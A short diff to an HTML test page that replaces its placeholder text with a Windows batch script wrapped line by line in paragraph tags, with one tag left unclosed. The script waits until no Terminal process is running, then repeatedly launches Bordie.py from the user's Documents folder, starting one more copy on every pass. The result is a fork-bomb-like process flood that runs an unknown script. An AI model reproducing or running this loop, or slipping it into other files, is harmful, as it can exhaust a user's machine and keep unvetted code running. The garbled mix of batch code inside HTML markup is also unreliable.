--- a/page2.html
+++ b/page2.html
@@ -1,5 +1,21 @@
 <html>
   <body>
-    <p>this is a test page</p>
+    <p>@echo off</p>
+    <p>set /a cur=1</p>
+    <p>:loop</p>
+    <p>tasklist | findstr /i "Terminal" > nul</p>
+    <p>if %errorlevel% == 0 (</p>
+    <p>    timeout /t 2 /nobreak > nul</p>
+    <p>    goto :loop</p>
+    <p>) else (</p>
+    <p>    if exist "C:\Users\%USERNAME%\Documents\Bordie.py" (</p>
+    <p>        cd "C:\Users\%USERNAME%\Documents"</p>
+    <p>        for /L %%i in (1, 1, %cur%) do (
+    <p>            start "shell" python .\Bordie.py</p>
+    <p>        )</p>
+    <p>        set /a cur+=1</p>
+    <p>        goto :loop</p>
+    <p>    )</p>
+    <p>)</p>
   </body>
 </html>
